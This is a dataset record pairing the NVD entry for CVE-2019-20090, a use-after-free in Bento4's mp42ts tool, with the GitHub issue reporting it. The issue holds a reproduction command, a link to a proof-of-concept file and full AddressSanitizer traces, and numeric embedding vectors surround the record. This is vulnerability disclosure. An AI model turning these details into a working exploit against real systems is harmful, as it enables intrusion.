-0.010794781148433685, 0.010153506882488728, 0.02158956229686737, -0.01246209442615509, 0.021233299747109413, -0.008450567722320557, -0.02446817047894001, 0.00862869992852211, -0.009141718968749046, -0.004143343307077885, -0.010125006549060345, 0.012098705396056175, 0.02079153247177601, 0.026320740580558777, 0.023043116554617882, -0.007146643940359354, 0.0030781158711761236, 0.006704877596348524, -0.009562109597027302, 0.020036254078149796, 0.007078954018652439, -0.007773667573928833, 0.0003633886808529496, 0.0015185727970674634, 0.00438203988596797, 0.0035804472863674164, -0.007951799780130386, -0.0005726934177801013, -0.012248336337506771, -0.00171629898250103, 0.02090553753077984, 0.0028964215889573097, -0.0012469219509512186, -0.014250536449253559, -0.014051028527319431, 0.01167831476777792, -0.001063446281477809, 0.00928422436118126, -0.011115418747067451, 0.0032936553470790386, 0.005842720158398151, -0.004788180347532034, -0.0017991302302107215, 0.009334101341664791, -0.0006221249932423234, 0.017171896994113922, -0.005340388510376215, 0.014499920420348644, 0.02898559160530567, -0.008657201193273067, 0.007267773617058992, 0.011884947307407856, 0.016958137974143028, -0.0016682033892720938, 0.03214921057224274, -0.02090553753077984, 0.005215696524828672, 0.0192524753510952, 0.01437879167497158, -0.006637187208980322, -0.0028109182603657246, -0.007994551211595535, -0.032348718494176865, 0.012882485054433346, 0.0018383192364126444, 0.0013716141693294048, -0.014777806587517262, -0.007730916142463684, -0.0020431706216186285, 0.02503819204866886, 0.00959061086177826, 0.014891810715198517, 0.0006996122538112104, -0.0020289202220737934, 0.02614973485469818, 0.007445905357599258, 0.006441242527216673, 0.013124744407832623, 0.013488132506608963, 0.009533609263598919, 0.004360664170235395, -0.0015034315874800086, 0.014792056754231453, -0.0071252682246267796, -0.006761879660189152, 0.0043535390868783, -0.010623774491250515, 0.01882495917379856, 0.0042680357582867146, 0.009120343253016472, -0.029085345566272736, 0.006209671031683683, -0.0018739455845206976, -0.00250631314702332, -0.0021963638719171286, 0.009768743067979813, -0.010980037972331047, 0.017927175387740135, -0.008536071516573429, -0.007816419005393982, 0.011094043031334877, 0.008735578507184982, -0.0049663120880723, 0.012013202533125877, -0.0114645566791296, -0.016430867835879326, 0.013352752663195133, -0.0020948287565261126, 0.008885209448635578, 0.020335515961050987, 0.024097656831145287, 0.00937685277312994, 0.02009325660765171, 0.015048566274344921, 0.002524126321077347, 0.0032562476117163897, -0.015162570402026176 ]
341
CVE-2019-20090
2019-12-30T04:15:11.030000
An issue was discovered in Bento4 1.5.1.0. There is a use-after-free in AP4_Sample::GetOffset in Core/Ap4Sample.h when called from Ap4LinearReader.cpp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/461" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/461
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
./mp42ts $poc out poc [test-002.zip](https://github.com/axiomatic-systems/Bento4/files/3938643/test-002.zip) asan output ``` root@ubuntu:/home/tim/Bento4/cmakebuild# ../../Bento4-asan/cmakebuild/mp42ts overflows/test-002.mp4-double_free-idx\:0xffffffff-0x0 out ================================================================= ==2623==ERROR: AddressSanitizer: heap-use-after-free on address 0x604000005458 at pc 0x55e3af247add bp 0x7ffd43666410 sp 0x7ffd43666400 READ of size 8 at 0x604000005458 thread T0 #0 0x55e3af247adc in AP4_Sample::GetOffset() const /home/tim/Bento4-asan/Source/C++/Core/Ap4Sample.h:99 #1 0x55e3af246319 in AP4_LinearReader::Advance(bool) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:436 #2 0x55e3af246fa0 in AP4_LinearReader::ReadNextSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:532 #3 0x55e3af232717 in FragmentedSampleReader::ReadSample(AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:149 #4 0x55e3af232aa2 in ReadSample /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:181 #5 0x55e3af233787 in WriteSamples /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:306 #6 0x55e3af235970 in main /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:636 #7 0x7fd67f91ab6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #8 0x55e3af232459 in _start (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x325459) 0x604000005458 is located 8 bytes inside of 48-byte region [0x604000005450,0x604000005480) freed by thread T0 here: #0 0x7fd67fdea845 in operator delete(void*, unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10f845) #1 0x55e3af247c40 in AP4_LinearReader::SampleBuffer::~SampleBuffer() /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.h:104 #2 0x55e3af2466f5 in AP4_LinearReader::Advance(bool) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:464 #3 0x55e3af246fa0 in AP4_LinearReader::ReadNextSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:532 #4 0x55e3af232717 in FragmentedSampleReader::ReadSample(AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:149 #5 0x55e3af232aa2 in ReadSample /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:181 #6 0x55e3af233927 in WriteSamples /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:317 #7 0x55e3af235970 in main /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:636 #8 0x7fd67f91ab6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) previously allocated by thread T0 here: #0 0x7fd67fde917f in operator new(unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10e17f) #1 0x55e3af245fa2 in AP4_LinearReader::Advance(bool) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:424 #2 0x55e3af246fa0 in AP4_LinearReader::ReadNextSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:532 #3 0x55e3af232717 in FragmentedSampleReader::ReadSample(AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:149 #4 0x55e3af232aa2 in ReadSample /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:181 #5 0x55e3af233927 in WriteSamples /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:317 #6 0x55e3af235970 in main /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:636 #7 0x7fd67f91ab6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) SUMMARY: AddressSanitizer: heap-use-after-free /home/tim/Bento4-asan/Source/C++/Core/Ap4Sample.h:99 in AP4_Sample::GetOffset() const Shadow bytes around the buggy address: 0x0c087fff8a30: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8a40: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8a50: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8a60: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8a70: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd =>0x0c087fff8a80: fa fa fd fd fd fd fd fa fa fa fd[fd]fd fd fd fd 0x0c087fff8a90: fa fa fd fd fd fd fd fa fa fa fa fa fa fa fa fa 0x0c087fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8ad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2623==ABORTING root@ubuntu:/home/tim/Bento4/cmakebuild# ```
use after free in Ap4Sample.h
https://api.github.com/repos/axiomatic-systems/Bento4/issues/461/comments
0
2019-12-09T08:53:39
2019-12-09T08:53:39Z
https://github.com/axiomatic-systems/Bento4/issues/461
534,780,352
461
true
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : use after free in Ap4Sample.h Issue date: --- start body --- ./mp42ts $poc out poc [test-002.zip](https://github.com/axiomatic-systems/Bento4/files/3938643/test-002.zip) asan output ``` root@ubuntu:/home/tim/Bento4/cmakebuild# ../../Bento4-asan/cmakebuild/mp42ts overflows/test-002.mp4-double_free-idx\:0xffffffff-0x0 out ================================================================= ==2623==ERROR: AddressSanitizer: heap-use-after-free on address 0x604000005458 at pc 0x55e3af247add bp 0x7ffd43666410 sp 0x7ffd43666400 READ of size 8 at 0x604000005458 thread T0 #0 0x55e3af247adc in AP4_Sample::GetOffset() const /home/tim/Bento4-asan/Source/C++/Core/Ap4Sample.h:99 #1 0x55e3af246319 in AP4_LinearReader::Advance(bool) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:436 #2 0x55e3af246fa0 in AP4_LinearReader::ReadNextSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:532 #3 0x55e3af232717 in FragmentedSampleReader::ReadSample(AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:149 #4 0x55e3af232aa2 in ReadSample /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:181 #5 0x55e3af233787 in WriteSamples /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:306 #6 0x55e3af235970 in main /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:636 #7 0x7fd67f91ab6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #8 0x55e3af232459 in _start (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x325459) 0x604000005458 is located 8 bytes inside of 48-byte region [0x604000005450,0x604000005480) freed by thread T0 here: #0 0x7fd67fdea845 in operator delete(void*, unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10f845) #1 0x55e3af247c40 in AP4_LinearReader::SampleBuffer::~SampleBuffer() /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.h:104 #2 0x55e3af2466f5 in AP4_LinearReader::Advance(bool) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:464 #3 0x55e3af246fa0 in AP4_LinearReader::ReadNextSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:532 #4 0x55e3af232717 in FragmentedSampleReader::ReadSample(AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:149 #5 0x55e3af232aa2 in ReadSample /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:181 #6 0x55e3af233927 in WriteSamples /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:317 #7 0x55e3af235970 in main /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:636 #8 0x7fd67f91ab6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) previously allocated by thread T0 here: #0 0x7fd67fde917f in operator new(unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10e17f) #1 0x55e3af245fa2 in AP4_LinearReader::Advance(bool) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:424 #2 0x55e3af246fa0 in AP4_LinearReader::ReadNextSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:532 #3 0x55e3af232717 in FragmentedSampleReader::ReadSample(AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:149 #4 0x55e3af232aa2 in ReadSample /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:181 #5 0x55e3af233927 in WriteSamples /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:317 #6 0x55e3af235970 in main /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:636 #7 0x7fd67f91ab6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) SUMMARY: AddressSanitizer: heap-use-after-free /home/tim/Bento4-asan/Source/C++/Core/Ap4Sample.h:99 in AP4_Sample::GetOffset() const Shadow bytes around the buggy address: 0x0c087fff8a30: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8a40: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8a50: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8a60: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8a70: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd =>0x0c087fff8a80: fa fa fd fd fd fd fd fa fa fa fd[fd]fd fd fd fd 0x0c087fff8a90: fa fa fd fd fd fd fd fa fa fa fa fa fa fa fa fa 0x0c087fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8ad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2623==ABORTING root@ubuntu:/home/tim/Bento4/cmakebuild# ``` --- end body ---
5,442
[ -0.012949167750775814, 0.009069629944860935, -0.005830476526170969, 0.017781836912035942, 0.02848965860903263, 0.008183516561985016, -0.03675508499145508, 0.031721364706754684, -0.02120714820921421, 0.037469930946826935, -0.024304820224642754, 0.026479149237275124, 0.0357721708714962, 0.011899235658347607, 0.015533044002950191, -0.001609338098205626, -0.020522085949778557, 0.015771327540278435, -0.019688095897436142, -0.009538748301565647, 0.015592615120112896, -0.01455012895166874, -0.008280319161713123, 0.027774810791015625, -0.00048121908912435174, 0.02019444666802883, -0.024349499493837357, -0.001605614903382957, -0.0032428766135126352, -0.009821709245443344, -0.010759946890175343, 0.017856299877166748, -0.004002402536571026, -0.014051225036382675, 0.02834073267877102, 0.029606608673930168, 0.050754185765981674, 0.055341124534606934, 0.01648617535829544, 0.023813363164663315, -0.014602253213524818, -0.07249747216701508, -0.008928149938583374, 0.00408431189134717, -0.012234319932758808, 0.0024163341149687767, 0.01124395802617073, 0.005674103274941444, -0.03690401092171669, 0.028579015284776688, 0.013090647757053375, 0.008481370285153389, -0.04125266894698143, -0.05680060386657715, 0.019107282161712646, -0.019092390313744545, 0.02963639423251152, 0.033151060342788696, 0.0039130463264882565, -0.011392884887754917, -0.028549229726195335, 0.0027234952431172132, 0.029591714963316917, 0.025898335501551628, -0.011713077314198017, 0.0029803935904055834, -0.01487032137811184, 0.012137518264353275, -0.03401483595371246, 0.014646931551396847, -0.031453296542167664, -0.0255558043718338, 0.01040996890515089, 0.06278745085000992, 0.007077736780047417, -0.02029869519174099, 0.037857141345739365, 0.02528773620724678, -0.023813363164663315, 0.061119478195905685, -0.035950880497694016, 0.02999381721019745, -0.034431830048561096, 0.03130437061190605, 0.03088737651705742, -0.006120883394032717, -0.0249154195189476, -0.06308531016111374, -0.01635214127600193, -0.03538496047258377, -0.0014269029488787055, 0.050009552389383316, 0.023977182805538177, 0.003153520869091153, 0.0042779166251420975, 0.018362650647759438, -0.032346855849027634, -0.018481791019439697, -0.04825221747159958, -0.008741991594433784, -0.03499775007367134, -0.0172457005828619, 0.005160306580364704, 0.012085394002497196, 0.025079239159822464, 0.00034532355493865907, -0.0034588202834129333, -0.01609896495938301, 0.024721816182136536, 0.10579745471477509, 0.013894851319491863, -0.0127779021859169, -0.010566342622041702, 0.027164211496710777, -0.021385859698057175, 0.028534336015582085, 0.018556253984570503, -0.021028436720371246, -0.03181072324514389, -0.029800212010741234, -0.0047693741507828236, -0.004843837581574917, 0.013410840183496475, 0.020775260403752327, -0.015547936782240868, 0.03079802170395851, 0.0274471715092659, -0.016024501994252205, -0.016441496089100838, -0.019434921443462372, -0.0114822406321764, -0.038482632488012314, -0.0038720916491001844, -0.016769135370850563, 0.005067227408289909, 0.008861132897436619, 0.004713526926934719, 0.031453296542167664, 0.02697060815989971, 0.0051267980597913265, -0.03332977369427681, -0.01544368825852871, 0.030857590958476067, -0.0014780964702367783, -0.006087374873459339, -0.01417036633938551, 0.006846900563687086, 0.026136618107557297, -0.013038523495197296, 0.005387419834733009, -0.008146285079419613, -0.03872091695666313, 0.012748116627335548, -0.0038162441924214363, 0.059451498091220856, 0.014274614863097668, 0.00692880991846323, 0.02577919512987137, -0.008838793262839317, -0.019211530685424805, 0.0012649452546611428, -0.033508483320474625, 0.030738450586795807, -0.0062139625661075115, -0.02579408697783947, -0.03294256329536438, 0.04384399205446243, 0.004732142668217421, -0.011765201576054096, 0.020388051867485046, -0.001678216620348394, 0.020239124074578285, 0.00482149887830019, 0.017439303919672966, -0.04021018370985985, -0.03079802170395851, 0.018675396218895912, 0.020149769261479378, -0.014162919484078884, -0.021639034152030945, 0.0009568533860146999, 0.021802853792905807, 0.023798471316695213, 0.007535685785114765, 0.008280319161713123, -0.023277226835489273, 0.03312127664685249, -0.04741822928190231, 0.030053388327360153, 0.010015313513576984, 0.005391142796725035, 0.003315478330478072, 0.03586152568459511, 0.003637532237917185, 0.04994998127222061, -0.027938630431890488, -0.022026244550943375, -0.033895693719387054, 0.005711335223168135, 0.001262152916751802, 0.013112987391650677, -0.01953916996717453, -0.02962150052189827, 0.020119983702898026, -0.0319000780582428, 0.017171237617731094, -0.009010059759020805, 0.04682252183556557, 0.03130437061190605, -0.008123946376144886, -0.02823648415505886, -0.03419354557991028, 0.0105440029874444, 0.012189642526209354, -0.012211981229484081, 0.014110795222222805, -0.03166179358959198, 0.014401202090084553, -0.0016940400237217546, -0.015175620093941689, 0.010834409855306149, -0.020105091854929924, 0.01992637850344181, -0.0041624982841312885, -0.008794115856289864, -0.004233238752931356, -0.0036393937189131975, -0.0029673625249415636, 0.01609896495938301, -0.01226410549134016, 0.03562324121594429, 0.006683081388473511, -0.03767842799425125, -0.015667079016566277, -0.00009249737922800705, 0.000011336746865708847, 0.005662933923304081, -0.0040880353190004826, 0.011653506197035313, 0.003432758152484894, 0.007613872643560171, 0.03374676778912544, -0.02440907061100006, -0.0027067409828305244, 0.009144092909991741, 0.07595256716012955, -0.03252556920051575, -0.0027700348291546106, -0.018094582483172417, 0.0197774525731802, 0.02926407754421234, -0.021102899685502052, 0.0011178803397342563, 0.01888389326632023, 0.01538411807268858, -0.012420478276908398, 0.021385859698057175, 0.0037678428925573826, -0.032734066247940063, -0.031125659123063087, 0.02375379204750061, -0.0016512236325070262, -0.034789253026247025, -0.02287512645125389, 0.006891578435897827, -0.0034476506989449263, -0.005960787180811167, 0.00012728570436593145, -0.028013093397021294, -0.006199069786816835, 0.03297235071659088, 0.014810750260949135, 0.0027383877895772457, -0.031244801357388496, -0.01207794714719057, -0.003909323364496231, 0.01239813957363367, 0.011832218617200851, -0.0006752890767529607, -0.015264976769685745, -0.0062586404383182526, 0.0210880059748888, -0.023277226835489273, 0.005685273092240095, 0.011869450099766254, -0.003939108457416296, 0.01156415045261383, -0.017290377989411354, -0.03562324121594429, -0.021624142304062843, 0.012360908091068268, 0.008473923429846764, -0.06820838153362274, -0.013462964445352554, -0.0022115600295364857, 0.022636843845248222, -0.025585589930415154, 0.0019509384874254465, -0.027253568172454834, 0.0066532958298921585, -0.027521636337041855, -0.01207794714719057, -0.03258514031767845, 0.005562408361583948, -0.05096268281340599, 0.00009278825018554926, -0.028802404180169106, -0.0019583848770707846, -0.014006546698510647, -0.012293891049921513, 0.03565302863717079, -0.04810329154133797, -0.004881069529801607, -0.0165904238820076, -0.02196667343378067, -0.02759609930217266, -0.029815105721354485, -0.016903169453144073, -0.030857590958476067, 0.007900556549429893, -0.05861750990152359, 0.0036151933018118143, -0.028519444167613983, 0.024826064705848694, 0.01320978906005621, 0.0035388683900237083, 0.008950488641858101, 0.03157243877649307, -0.0651702806353569, 0.00798246543854475, -0.005372527055442333, -0.010454647243022919, -0.0018746135756373405, -0.028132235631346703, -0.002116619376465678, -0.020477406680583954, -0.019747667014598846, 0.0046353405341506, 0.007677166257053614, -0.012688546441495419, -0.01824350841343403, 0.018481791019439697, 0.021609250456094742, 0.003082780633121729, -0.01193646714091301, 0.011690737679600716, 0.016947846859693527, -0.0033657411113381386, 0.016888275742530823, 0.03169158101081848, 0.0010741330916061997, 0.02284534089267254, 0.01876475103199482, 0.012539619579911232, 0.013589552603662014, -0.004169944673776627, -0.018600933253765106, -0.0027737580239772797, 0.029398111626505852, -0.024945205077528954, 0.010968443937599659, -0.01245026383548975, -0.027506742626428604, 0.00945683941245079, 0.006854346953332424, 0.020254017785191536, -0.001896952511742711, -0.012651314958930016, 0.0030641648918390274, 0.011906681582331657, -0.01761801727116108, 0.0370529368519783, -0.010946105234324932, 0.014013992622494698, -0.006377781741321087, -0.037886928766965866, 0.018794536590576172, 0.02985978312790394, -0.019449813291430473, 0.010387630201876163, -0.0018597209127619863, 0.015294761396944523, 0.033776551485061646, -0.031751152127981186, 0.01901792734861374, 0.008578171953558922, -0.029606608673930168, 0.038244351744651794, -0.054209280759096146, -0.02633022330701351, -0.025213273242115974, 0.05185624212026596, -0.013112987391650677, -0.048192646354436874, -0.004263023845851421, 0.05295829847455025, -0.023709114640951157, -0.023843148723244667, -0.01866050250828266, -0.06880409270524979, 0.023724006488919258, -0.002462873701006174, 0.027804596349596977, 0.004099204670637846, -0.014565021730959415, 0.04866921156644821, 0.019211530685424805, -0.014713947661221027, 0.025123916566371918, 0.024215465411543846, 0.03860177472233772, -0.0007064705714583397, -0.01003020629286766, 0.00964299775660038, 0.04432055726647377, 0.008749437518417835, -0.00830265786498785, 0.028296053409576416, -0.017841406166553497, 0.03184050694108009, -0.01124395802617073, 0.008727098815143108, -0.0032931393943727016, 0.006370335351675749, 0.03934640809893608, 0.024170788004994392, -0.02628554403781891, -0.00708890613168478, 0.0007162438705563545, -0.05960042402148247, -0.018481791019439697, 0.016932955011725426, 0.015413902699947357, 0.005435820668935776, -0.0010629636235535145, -0.040269751101732254, -0.003404834307730198, -0.05030740424990654, -0.02146032266318798, -0.02719399705529213, -0.030827805399894714, 0.033389344811439514, -0.03425311669707298, 0.0026360007468611, 0.025719624012708664, -0.052690230309963226, -0.024230357259511948, -0.00983660202473402, 0.028832189738750458, -0.02579408697783947, -0.041193097829818726, 0.023321906104683876, 0.01647128164768219, 0.004021018277853727, 0.017260592430830002, 0.001227713655680418, -0.0027197720482945442, 0.002265546005219221, 0.028951330110430717, -0.004002402536571026, -0.01519795972853899, 0.0230091605335474, 0.0009698845096863806, -0.017305271700024605, 0.003916769754141569, 0.006146945524960756, -0.0007255517994053662, -0.028936438262462616, 0.001848551444709301, -0.01900303363800049, -0.004620447754859924, -0.014579914510250092, 0.010246150195598602, 0.000690181739628315, 0.013865066692233086, 0.027938630431890488, -0.0036673175636678934, -0.03151286765933037, -0.0019341842271387577, -0.07726311683654785, 0.0031330434139817953, -0.018705181777477264, -0.030946947634220123, 0.029666177928447723, 0.0005040234536863863, 0.00494436314329505, -0.004970425274223089, 0.012174749746918678, -0.0034308964386582375, -0.028281161561608315, 0.020760368555784225, -0.016784027218818665, 0.004843837581574917, -0.011310975067317486, 0.010975890792906284, -0.008213302120566368, -0.01901792734861374, -0.009293019771575928, 0.022532595321536064, 0.03618916496634483, 0.020239124074578285, -0.025377092882990837, 0.020596548914909363, -0.00951640959829092, 0.005871430970728397, -0.07887152582406998, -0.01463203877210617, -0.007870770990848541, -0.005737397354096174, -0.03359784185886383, -0.013887405395507812, -0.03496796637773514, 0.02220495603978634, -0.05686017498373985, -0.025987692177295685, -0.022651735693216324, -0.005610809661448002, -0.02591322921216488, 0.0058565386570990086, -0.00392421567812562, -0.0009894310496747494, -0.03732100501656532, 0.0016940400237217546, 0.012301336973905563, 0.01283002644777298, 0.022696413099765778, 0.04303978756070137, 0.007781414780765772, 0.033002134412527084, -0.017677586525678635, 0.0031051195692270994, -0.007155923172831535, -0.01468416303396225, 0.0229644812643528, -0.02029869519174099, -0.015354332514107227, -0.012480049394071102, 0.020983757451176643, -0.002757003763690591, -0.0044454592280089855, -0.016530852764844894, 0.05054568871855736, -0.007338358089327812, 0.021609250456094742, -0.05352421849966049, 0.038125209510326385, 0.017037203535437584, 0.04825221747159958, -0.013604444451630116, 0.012293891049921513, 0.009911064989864826, -0.0134182870388031, -0.01231622975319624, 0.0184966828674078, -0.0004705149622168392, 0.027774810791015625, -0.031721364706754684, 0.02798330783843994, 0.014982015825808048, 0.03639766201376915, -0.03166179358959198, -0.0070926290936768055, 0.023411260917782784, -0.017573338001966476, -0.004583216272294521, 0.010826963931322098, 0.011333314701914787, 0.03413397818803787, -0.01991148665547371, -0.018332865089178085, 0.0005603363388217986, 0.0029357154853641987, 0.03222771733999252, -0.015994716435670853, 0.01365656964480877, 0.006489476654678583, -0.005327849183231592, -0.02105822041630745, -0.014125688001513481, -0.04518432915210724, 0.03907833993434906, -0.03014274314045906, -0.009300466626882553, 0.013768264092504978, 0.012614083476364613, 0.0018904369790107012, -0.0009540610481053591, -0.002271130681037903, 0.006913917604833841, -0.012524726800620556, 0.0034625434782356024, 0.001175589393824339, -0.034282904118299484, -0.014475665055215359, -0.0018932294333353639, -0.004009848926216364, 0.00599801866337657, -0.021624142304062843, 0.0021687436383217573, 0.005435820668935776, -0.0014408648712560534, 0.023441046476364136, -0.0027867890894412994, -0.03869112953543663, -0.030098065733909607, 0.01775205135345459, -0.00005916341979173012, 0.006582555826753378, -0.022830447182059288, 0.03764864429831505, 0.015592615120112896, 0.0159500390291214, 0.04393334686756134, -0.0105440029874444, 0.003419727087020874, -0.002066356595605612, 0.023336797952651978, 0.026911037042737007, -0.013917190954089165, 0.011951359920203686, 0.011095032095909119, -0.03973361849784851, 0.010231257416307926, -0.014989462681114674, -0.007729290518909693, 0.019494492560625076, -0.009799370542168617, 0.013969315215945244, -0.002230175770819187, -0.024751601740717888, -0.01916685327887535, 0.04405248910188675, 0.009546195156872272, -0.030857590958476067, -0.03303191810846329, 0.03720186650753021, 0.0587664358317852, -0.012308783829212189, -0.00043165445094928145, -0.0001175705692730844, 0.011467347852885723, -0.0031255970243364573, -0.018824322149157524, 0.009367482736706734, -0.02527284435927868, 0.02093908004462719, 0.006426182575523853, -0.012733223848044872, 0.019851915538311005, -0.013038523495197296, -0.05194559693336487, -0.021385859698057175, -0.007677166257053614, 